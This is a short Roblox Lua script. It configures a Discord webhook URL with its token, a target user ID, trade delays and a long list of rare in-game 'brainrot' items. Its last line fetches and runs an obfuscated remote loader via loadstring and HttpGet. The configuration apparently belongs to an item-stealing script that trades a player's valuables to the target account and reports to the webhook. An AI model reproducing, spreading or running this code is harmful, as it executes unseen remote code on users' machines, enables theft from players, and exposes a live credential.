getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1480193591782543392/oswt9ZR_oPupyxWA-3l7NYaZOCuVzskDhMu_tnYVs4Vv42HYP3vJQDtXkW0HB9N7RYph"
getgenv().TARGET_ID = 9447107838
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Garama and Madundung"] = true,
    ["Capitano Moby"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Tang Tang Keletang"] = true,
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Graipuss Medussi"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Agarrini la Palini"] = true,
    ["Fragola La La La"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["La Grande Combinasion"] = true,
    ["Los Trios"] = true,
    ["La Sahur Combinasion"] = true,
    ["Bacuru and Egguru"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Money Money Reindeer"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Jackorilla"] = true,
    ["Extinct Tralalero"] = true,
    ["Reindeer Tralala"] = true,
    ["Pumpkini Spyderini"] = true,
    ["Frankentteo"] = true,
    ["Santteo"] = true,
    ["Telemorte"] = true,
    ["Spaghetti Tualetti"] = true,
    ["La Secret Combinasion"] = true,
    ["La Food Combinasion"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Karkerkar Kurkur"] = true,
    ["La Ginger Sekolah"] = true,
    ["Rosey and Teddy"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Swaggy Bros"] = true,
    ["La Taco Combinasion"] = true,
    ["Chipso and Queso"] = true,
    ["La Spooky Grande"] = true,
    ["Tuff Toucan"] = true,
    ["Chillin Chili"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Strawberry Elephant"] = true,
    ["La Extinct Grande"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Perrito Burrito"] = true,
    ["La Vacca Saturno Saturnita"] = true,
    ["Karker Sahur"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Bunnyman"] = true,
    ["Brunito Marsito"] = true,
    ["Guest 666"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Extinct Matteo"] = true,
    ["Los Quesadillas"] = true,
    ["Spinny Hammy"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
